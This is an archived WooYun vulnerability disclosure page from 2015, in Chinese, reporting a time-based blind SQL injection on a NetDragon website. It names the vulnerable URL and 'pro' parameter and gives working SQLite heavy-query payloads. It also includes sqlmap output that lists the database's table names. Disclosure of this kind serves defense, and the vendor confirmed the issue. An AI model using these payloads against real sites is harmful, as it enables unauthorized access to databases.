网龙某站存在SQL盲注漏洞 (sqlite时间盲注技巧)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146353

漏洞标题：网龙某站存在SQL盲注漏洞 (sqlite时间盲注技巧)

漏洞作者：路人甲

提交时间：2015-10-13 11:24

修复时间：2015-11-28 09:28

公开时间：2015-11-28 09:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-13：细节已通知厂商并且等待厂商处理中
2015-10-14：厂商已经确认，细节仅向厂商公开
2015-10-24：细节向核心白帽子及相关领域专家公开
2015-11-03：细节向普通白帽子公开
2015-11-13：细节向实习白帽子公开
2015-11-28：细节向公众公开

简要描述：

网龙某站存在SQL盲注漏洞

详细说明：

http://ty.top.99.com/userlevel.aspx?pro=20

漏洞证明：

Parameter: pro (GET)
    Type: stacked queries
    Title: SQLite > 2.0 stacked queries (heavy query - comment)
    Payload: pro=20;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))--
    Type: AND/OR time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: pro=20 AND 8822=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
---
[22:04:08] [INFO] the back-end DBMS is SQLite
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: SQLite
[22:04:08] [INFO] fetching tables for database: 'SQLite_masterdb'
[22:04:08] [INFO] fetching number of tables for database 'SQLite_masterdb'
[22:04:08] [WARNING] time-based comparison requires larger statistical model, please wait..............................  
[22:04:19] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:04:19] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
25
[22:06:21] [INFO] retrieved: server
[22:18:00] [INFO] retrieved: dbbrushtimestam
[22:49:55] [ERROR] invalid character detected. retrying..
p
[22:52:57] [INFO] retrieved: userl
[23:06:35] [ERROR] invalid character detected. retrying..
evelsort
[23:23:44] [INFO] retrieved: sqlite_A
[23:38:27] [INFO] retrieved: 
[23:39:58] [ERROR] invalid character detected. retrying..
a
[23:44:31] [ERROR] invalid character detected. retrying..
sermoneysort
[00:09:51] [INFO] retrieved: eudemonsort
[00:35:33] [ERROR] invalid character detected. retrying..
_All
[00:43:41] [INFO] retrieved: eudemonsort_World
[01:20:31] [INFO] retrieved: eudemonsort_Area_5
[01:55:26] [INFO] retrieved: eudemonsort_Area_6
[02:30:48] [INFO] retrieved: eudemonsor
[03:05:29] [ERROR] invalid character detected. retrying..
' _Area_15
[03:24:41] [INFO] retrieved: eudemonsort_Area_16
[04:01:03] [INFO] retrieved: eudemonsort_Ar
[04:29:23] [INFO] retrieved: 
[04:30:55] [ERROR] invalid character detected. retrying..
eudemonsoqt_S
[05:01:12] [ERROR] invalid character detected. retrying..
[05:04:20] [ERROR] invalid character detected. retrying..
erver_13
[05:19:01] [INFO] retrieved: eudemonsort_Server_25
[06:01:27] [INFO] retrieved: eudemonsort_Server_68
[06:45:20] [INFO] retrieved: eudemonsort_Server_78
[07:29:14] [INFO] retrieved: eudemonsort_Serve
[08:06:33] [ERROR] invalid character detected. retrying..
[08:10:05] [ERROR] invalid character detected. retrying..
[08:12:48] [ERROR] invalid character detected. retrying..
r_79
[08:20:53] [INFO] retrieved: eudemonsort_Server_8
[09:04:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
7
[09:04:31] [INFO] retrieved: 
[09:04:32] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[09:04:32] [INFO] retrieved: 
[09:04:32] [INFO] retrieved: 
[09:04:33] [INFO] retrieved: 
[09:04:34] [INFO] retrieved: 
[09:04:34] [INFO] retrieved: 
[09:04:35] [INFO] retrieved: 
Database: SQLite_masterdb
[18 tables]
+-------------------------+
| asermoneysort           |
| dbbrushtimestamp        |
| eudemonsoqt_Server_13   |
| eudemonsor'\x00_Area_15 |
| eudemonsort_All         |
| eudemonsort_Ar          |
| eudemonsort_Area_16     |
| eudemonsort_Area_5      |
| eudemonsort_Area_6      |
| eudemonsort_Server_25   |
| eudemonsort_Server_68   |
| eudemonsort_Server_78   |
| eudemonsort_Server_79   |
| eudemonsort_Server_87   |
| eudemonsort_World       |
| server                  |
| sqlite_A                |
| userlevelsort           |
+-------------------------+

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-10-14 09:27

厂商回复：

感谢路人甲的支持

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146353

漏洞标题：网龙某站存在SQL盲注漏洞 (sqlite时间盲注技巧)

相关厂商：福建网龙

漏洞作者：路人甲

提交时间：2015-10-13 11:24

修复时间：2015-11-28 09:28

公开时间：2015-11-28 09:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146353

漏洞标题：网龙某站存在SQL盲注漏洞 (sqlite时间盲注技巧)

相关厂商：福建网龙

漏洞作者： 路人甲

提交时间：2015-10-13 11:24

修复时间：2015-11-28 09:28

公开时间：2015-11-28 09:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0146353"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云